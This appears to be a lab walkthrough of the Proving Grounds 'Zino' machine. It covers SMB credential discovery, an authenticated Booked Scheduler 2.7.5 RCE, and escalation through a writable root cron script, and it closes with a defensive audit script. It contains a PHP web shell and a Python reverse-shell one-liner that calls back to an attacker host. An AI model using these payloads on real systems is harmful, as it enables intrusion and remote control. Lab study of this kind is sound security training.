Proving Grounds | Zino

Jm Villano
4 min read, Aug 8, 2021

SCANNING:

Host is up, received user-set (0.24s latency).
Scanned at 2021-08-06 23:49:40 EDT for 861s
Not shown: 65529 filtered ports
Reason: 65529 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC44YysvRUv+02vB7LK+DbEvDnTUU2Zzaj42pbyX7gL4I5DhhWWZmK4Sr/MulEE2XPnKhXCCwTVuA12C/VuFhVdnq7WjDwfV+4a1DEuDG8P7wQAux0waAsly34mGtd7HQhQIv9h7nQWcTx8hoOrF6D71eHiZmLJ6fk01VlFN75XKJGn/T/ClJHz9UJ33zwkhqXskMO9At21LfOBE+I3IQCHuFFO6DcQWw/SsZaXQxHNzLqnI/9j1aQuvyuh6KMdT6p10D577maBz+T+Hyq/qeOgbGU0YGAoXXMU36FibkoQ+WwDRYbEHYKJccUXhzFWp980PYCIDtZNaWuo/AbgryLB
| 256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOmcORNC6GjDnH1cqJrCeytZJjGrpJyY+CgseFsH27PJmSbmVYEz0ls0w/oXR0xrG/IfvxxyH9RRX2BIsBTx2cY=
| 256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9wfKL6wusRXGDMv5Tcf2OxMAIkhvOofRPsrSQ+aMbK
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack
| fingerprint-strings:
| DNSVersionBindReqTCP, NULL:
|_ Host '192.168.49.152' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.49.152' is not allowed to connect to this MariaDB server
8003/tcp open http syn-ack Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /

Using smbclient, we can list the shares on the target machine:

Sharename  Type  Comment
---------  ----  -------
zino       Disk  Logs
print$     Disk  Printer Drivers
IPC$       IPC   IPC Service (Samba 4.9.5-Debian)

We can log in anonymously to the zino share.

Downloading misc.log and viewing its contents, we find credentials that we can use for the web app running on port 8003.

Exploitation:

Viewing the site on port 8003, we immediately notice that the web app's name and version are shown at the bottom of the page. Googling Booked Scheduler v2.7.5, we find this step-by-step RCE exploit on GitHub: https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF.

After authenticating as admin with the credentials we found, navigate to /booked/Web/admin/manage_theme.php and upload a PHP web shell in place of the custom favicon. No null-byte or file-extension bypass is needed.

You can use this web shell: <?php system($_GET['cmd']); ?>
OR
You can also upload a PHP reverse shell right off the bat. Just use a port that's open on the target to circumvent firewall rules.

This time, we will make use of a web shell.

We can access our malicious PHP file at http://192.168.152.64:8003/booked/Web/custom-favicon.php

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.152",21));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

We can pass the Python payload above through the web shell to get a reverse shell; it connects back on port 21, which is one of the ports open on the target.

Privilege Escalation:

If we take a look at the system-wide cronjobs at /etc/crontab, we can see that the root user runs the python script /var/www/html/booked/cleanup.py every 3 minutes.

The python script cleans the /var/www/html/booked/uploads/reservastion directory of all files/folders recursively.

Checking our permissions on the script, we have write and execute permissions on the file. We can leverage our write access to this script together with the fact that root runs it every 3 minutes.

We can edit the script locally and replace cleanup.py on the target with our version. In my case, I edited the script so that it connects back to our host machine on port 21; we listen on port 21 and wait for the connection to be made.

We get our reverse shell after root executes the cronjob.
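The root cause of this escalation is a root-run cron job whose script is writable by an unprivileged user. The following audit is an added example (not part of the original write-up) that a defender can run on a host to flag exactly that pattern: it parses /etc/crontab-style entries, keeps the jobs that run as root, and reports any absolute path in the command that is group- or world-writable. The demo() fixture builds its own constructed crontab and script files in a temp directory; the cleanup.py and rotate.sh names there are invented for the demo.

```python
import os
import re
import stat
import tempfile

# /etc/crontab format: five time fields, then the user, then the command.
SYSTEM_CRON_RE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_system_crontab(text):
    """Return (user, command) tuples; comments, blanks and VAR=value lines are skipped."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue
        m = SYSTEM_CRON_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd").strip()))
    return jobs

def weak_root_jobs(crontab_text):
    """(path, mode) for every absolute path in a root job that group or world can write."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in (tok for tok in cmd.split() if tok.startswith("/")):
            try:
                st = os.stat(path)  # follows symlinks, as cron's execution would
            except OSError:
                continue  # missing path: nothing to check here
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, oct(stat.S_IMODE(st.st_mode))))
    return findings

def demo():
    """Constructed fixture (not the target's real files): one 0777 script, one 0755 script."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "cleanup.py")   # world-writable, like the job in the write-up
    good = os.path.join(d, "rotate.sh")   # owner-writable only, should not be flagged
    for p, mode in ((bad, 0o777), (good, 0o755)):
        open(p, "w").close()
        os.chmod(p, mode)
    crontab = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
               f"*/3 * * * * root /usr/bin/python3 {bad}\n"
               f"0 3 * * * root {good}\n"
               "* * * * * www-data /bin/true\n")
    return weak_root_jobs(crontab)
```

Running demo() returns only the world-writable cleanup.py entry; the same weak_root_jobs() call can be pointed at the contents of a real /etc/crontab or the files under /etc/cron.d.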
